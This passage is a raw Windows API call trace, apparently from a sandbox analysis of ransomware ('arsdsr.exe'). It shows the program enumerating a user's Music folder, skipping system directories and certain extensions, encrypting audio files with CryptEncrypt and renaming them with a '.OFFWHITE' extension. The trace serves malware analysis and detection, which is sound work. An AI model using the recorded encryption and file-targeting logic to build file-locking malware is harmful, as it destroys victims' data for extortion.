lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.950] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.950] WriteFile (in: hFile=0x218, lpBuffer=0x531850*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531850*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.950] GetProcessHeap () returned 0x500000 [0134.950] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18055) returned 0x55c7c8 [0134.950] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.951] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x18055, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x18055, lpOverlapped=0x0) returned 1 [0134.957] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.957] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x18055, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x18055, lpOverlapped=0x0) returned 1 [0134.958] GetProcessHeap () returned 0x500000 [0134.958] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.958] CloseHandle (hObject=0x218) returned 1 [0134.960] GetProcessHeap () returned 0x500000 [0134.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.960] GetProcessHeap () returned 0x500000 [0134.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.960] GetProcessHeap () returned 0x500000 [0134.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.960] GetProcessHeap () returned 0x500000 [0134.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.960] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a" [0134.960] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a.OFFWHITE" [0134.961] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\sybes.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\sybes.m4a.offwhite")) returned 1 [0134.961] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91806f0, ftCreationTime.dwHighDateTime=0x1d5e705, ftLastAccessTime.dwLowDateTime=0x40718b40, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x40718b40, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x15d42, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="uxxh9U0Y1S788kk.wav", cAlternateFileName="UXXH9U~1.WAV")) returned 1 [0134.961] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2=".") returned 1 [0134.961] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="..") returned 1 [0134.961] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="...") returned 1 [0134.961] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="windows") returned -1 [0134.961] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="$recycle.bin") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="rsa") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="ntuser.dat") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="programdata") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="appdata") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="program files") returned 1 [0134.962] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="program files (x86)") returned 1 [0134.962] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.962] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="uxxh9U0Y1S788kk.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav" [0134.962] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.962] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.962] PathFindExtensionW (pszPath="uxxh9U0Y1S788kk.wav") returned=".wav" [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0134.962] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0134.963] lstrcmpiW (lpString1="uxxh9U0Y1S788kk.wav", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.963] GetProcessHeap () returned 0x500000 [0134.963] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531860 [0134.963] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\uxxh9u0y1s788kk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.963] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=89410) returned 1 [0134.963] GetProcessHeap () returned 0x500000 [0134.963] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.963] GetProcessHeap () returned 0x500000 [0134.963] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.963] GetProcessHeap () returned 0x500000 [0134.963] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.963] GetProcessHeap () returned 0x500000 [0134.963] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.964] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.964] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.964] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.964] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.964] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.964] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.964] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.964] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.964] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.964] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.964] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.964] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.965] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15d42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.965] SetLastError (dwErrCode=0x0) [0134.965] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.967] GetLastError () returned 0x0 [0134.967] GetLastError () returned 0x0 [0134.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15e42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.967] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15f42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.967] WriteFile (in: hFile=0x218, lpBuffer=0x531860*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531860*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.967] GetProcessHeap () returned 0x500000 [0134.967] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15d42) returned 0x55c7c8 [0134.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.967] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x15d42, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x15d42, lpOverlapped=0x0) returned 1 [0134.974] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.974] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x15d42, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x15d42, lpOverlapped=0x0) returned 1 [0134.974] GetProcessHeap () returned 0x500000 [0134.974] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.974] CloseHandle (hObject=0x218) returned 1 [0134.977] GetProcessHeap () returned 0x500000 [0134.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.977] GetProcessHeap () returned 0x500000 [0134.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.977] GetProcessHeap () returned 0x500000 [0134.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.977] GetProcessHeap () returned 0x500000 [0134.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.977] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav" [0134.977] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav.OFFWHITE" [0134.977] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\uxxh9u0y1s788kk.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\uxxh9U0Y1S788kk.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\uxxh9u0y1s788kk.wav.offwhite")) returned 1 [0134.978] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fa7d60, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xfdcdfa0, ftLastAccessTime.dwHighDateTime=0x1d5e7e8, ftLastWriteTime.dwLowDateTime=0xfdcdfa0, ftLastWriteTime.dwHighDateTime=0x1d5e7e8, nFileSizeHigh=0x0, nFileSizeLow=0x16fb7, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="ZuLAilXUctuhbjdK51.m4a", cAlternateFileName="ZULAIL~1.M4A")) returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2=".") returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="..") returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="...") returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="windows") returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="$recycle.bin") returned 1 [0134.978] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="rsa") returned 1 [0134.979] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="ntuser.dat") returned 1 [0134.979] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="programdata") returned 1 [0134.979] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="appdata") returned 1 [0134.979] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="program files") returned 1 [0134.979] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="program files (x86)") returned 1 [0134.979] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.979] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="ZuLAilXUctuhbjdK51.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a" [0134.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.979] PathFindExtensionW (pszPath="ZuLAilXUctuhbjdK51.m4a") returned=".m4a" [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.979] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.980] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.980] lstrcmpiW (lpString1="ZuLAilXUctuhbjdK51.m4a", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.980] GetProcessHeap () returned 0x500000 [0134.980] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531870 [0134.980] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\zulailxuctuhbjdk51.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.983] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=94135) returned 1 [0134.983] GetProcessHeap () returned 0x500000 [0134.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.983] GetProcessHeap () returned 0x500000 [0134.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.983] GetProcessHeap () returned 0x500000 [0134.984] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.984] GetProcessHeap () returned 0x500000 [0134.984] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.984] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.984] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.984] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.984] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.985] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x16fb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.985] SetLastError (dwErrCode=0x0) [0134.985] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.987] GetLastError () returned 0x0 [0134.987] GetLastError () returned 0x0 [0134.987] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x170b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.987] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.987] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x171b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.987] WriteFile (in: hFile=0x218, lpBuffer=0x531870*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531870*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.987] GetProcessHeap () returned 0x500000 [0134.987] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16fb7) returned 0x55c7c8 [0134.987] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.987] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x16fb7, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x16fb7, lpOverlapped=0x0) returned 1 [0134.994] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.994] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x16fb7, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x16fb7, lpOverlapped=0x0) returned 1 [0134.995] GetProcessHeap () returned 0x500000 [0134.995] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.995] CloseHandle (hObject=0x218) returned 1 [0135.000] GetProcessHeap () returned 0x500000 [0135.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.000] GetProcessHeap () returned 0x500000 [0135.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.000] GetProcessHeap () returned 0x500000 [0135.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.000] GetProcessHeap () returned 0x500000 [0135.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.000] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a" [0135.000] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a.OFFWHITE" [0135.000] 